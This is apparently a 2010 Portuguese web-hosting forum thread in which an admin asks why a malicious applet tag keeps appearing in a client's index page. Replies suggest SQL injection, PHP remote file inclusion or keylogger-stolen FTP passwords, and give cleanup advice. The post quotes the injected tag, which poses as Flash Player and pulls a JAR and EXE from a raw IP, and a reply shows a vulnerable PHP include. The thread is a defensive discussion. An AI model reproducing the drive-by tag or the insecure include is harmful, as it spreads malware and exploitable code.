Help
Equipe,
Estou com um problema de segurança no meu servidor.
Em uma determinada conta, esta sendo injetado automaticamente a linha de código abaixo que chama um executável a cada vez que a index é carregada.
<applet name="Adobe Flash Player version 10.0.015.7" code="Main.class" archive="http://72.11.128.115/.../Plugin.jar" height="10" width="1"><param name="link" value="http://72.11.128.115/.../Plugin.exe"></applet>
Um colega comentou que pode ser mySql injection...alguém pode me dar uma luz de como resolver isso?
Grato,
Page 1 of 1
Script injetado na index de uma determinada conta. http://72.11.128.115/.../Plugin.jar
#1
- Esse é irmão!!
-
- Grupo: Membros
- Posts: 307
- Cadastrado: 12-janeiro 07
- Location:São Paulo
Posted 26 maio 2010 - 09:16
#2
- Ele mora no fórum!
-
- Grupo: Membros
- Posts: 576
- Cadastrado: 19-dezembro 05
- Location:MG
Posted 27 maio 2010 - 02:54
Olá, pode ser uma sql injetion, se estiverem injetando estes dados no banco de dados da conta, em algum formulario por exemplo.
Isso voce terá que ver no arquivo se existe algum echo e se esses dados vem do banco.
Mas existem casos que o programador estava com muita preguiça e simplesmente fez um:
Neste caso um simples post (www.site.com.br/arquivo.php?pagina=http://www.fuck.com.br , mas o php 5 por exemplo já barra isso, se as diretivas estiverem ok, o que pode ocorrer é se no lugar do include for um curl) o cara pode incluir o que quiser, uma pagina hospedada em outro host por exemplo e colocar virus na index.
O que recomendo é analisar os arquivos, mas sempre antes de fazer qualquer coisa é viavel acessar o ftp do cliente, analisar na pasta onde esta o codigo malicioso e verificar a data de modificação dos arquivos, pois podem ter conseguido enviar um arquivo para dentro da hospedagem, ou via ftp ou via um formulario de upload por exemplo, no segundo caso tambem falha do desenvolvedor, pois todo upload de arquivos tem que existir regras de qual tipo de arquivo aceita, e etc.
É comum tambem (infelizmente para nos que sofremos com isso) senhas de FTP conseguidas via keylogger na maquina do usuario mesmo, neste caso a unica coisa a fazer é mudar a senha, retirar os arquivos maliciosos, e pedir para o cliente formatar o OS dele, ou se for um tecnico bom, que pelo menos passe algum detector de pragas, para limpar o pc.
Caso contrario, voce volta o backup e a merda ocorre novamente e por ai vai.
Qualquer coisa poste ai, estou meio desligado do forum, mas sempre estou por aqui.
De uma olhada nestas dicas que estao no proprio forumcpanel para proteger o php
http://www.forumcpanel.com.br/index.php?sh...mp;hl=injection
http://www.forumcpanel.com.br/index.php?sh...mp;hl=injection
http://www.forumcpanel.com.br/index.php?sh...mp;hl=injection
ou na biblia do php http://php.net/manual/pt_BR/security.filesystem.php
abraços
Isso voce terá que ver no arquivo se existe algum echo e se esses dados vem do banco.
Mas existem casos que o programador estava com muita preguiça e simplesmente fez um:
CODE
<?
include($pagina);
?>
include($pagina);
?>
Neste caso um simples post (www.site.com.br/arquivo.php?pagina=http://www.fuck.com.br , mas o php 5 por exemplo já barra isso, se as diretivas estiverem ok, o que pode ocorrer é se no lugar do include for um curl) o cara pode incluir o que quiser, uma pagina hospedada em outro host por exemplo e colocar virus na index.
O que recomendo é analisar os arquivos, mas sempre antes de fazer qualquer coisa é viavel acessar o ftp do cliente, analisar na pasta onde esta o codigo malicioso e verificar a data de modificação dos arquivos, pois podem ter conseguido enviar um arquivo para dentro da hospedagem, ou via ftp ou via um formulario de upload por exemplo, no segundo caso tambem falha do desenvolvedor, pois todo upload de arquivos tem que existir regras de qual tipo de arquivo aceita, e etc.
É comum tambem (infelizmente para nos que sofremos com isso) senhas de FTP conseguidas via keylogger na maquina do usuario mesmo, neste caso a unica coisa a fazer é mudar a senha, retirar os arquivos maliciosos, e pedir para o cliente formatar o OS dele, ou se for um tecnico bom, que pelo menos passe algum detector de pragas, para limpar o pc.
Caso contrario, voce volta o backup e a merda ocorre novamente e por ai vai.
Qualquer coisa poste ai, estou meio desligado do forum, mas sempre estou por aqui.
De uma olhada nestas dicas que estao no proprio forumcpanel para proteger o php
http://www.forumcpanel.com.br/index.php?sh...mp;hl=injection
http://www.forumcpanel.com.br/index.php?sh...mp;hl=injection
http://www.forumcpanel.com.br/index.php?sh...mp;hl=injection
ou na biblia do php http://php.net/manual/pt_BR/security.filesystem.php
abraços
This post has been edited by staticx: 27 maio 2010 - 03:13
#3
- Se às mãos fazem errar -> yum remove hands -y
-
- Grupo: Membros
- Posts: 1166
- Cadastrado: 19-julho 07
- Gender:Male
- Interests:Gnu/Linux, Windows Server, PHP, Mysql, Postgres, Ajax, Flex e Café, soldat, Warcraft, Quake, Counter Strike, Cachorros, Surf e tomar muito, mas muito café!
Posted 27 maio 2010 - 10:39
Ainda que seja injection, a primeira coisa antes de afirmar isto é olhar o /vag/log/messages e capturar todas as entradas do user.
Keyloggers falam mais alto na hora de inserir códigos.
Afinal de contas, quem é doido de enfrentar boas rules no modsecurity?
Keyloggers falam mais alto na hora de inserir códigos.
Afinal de contas, quem é doido de enfrentar boas rules no modsecurity?
Share this topic:
Page 1 of 1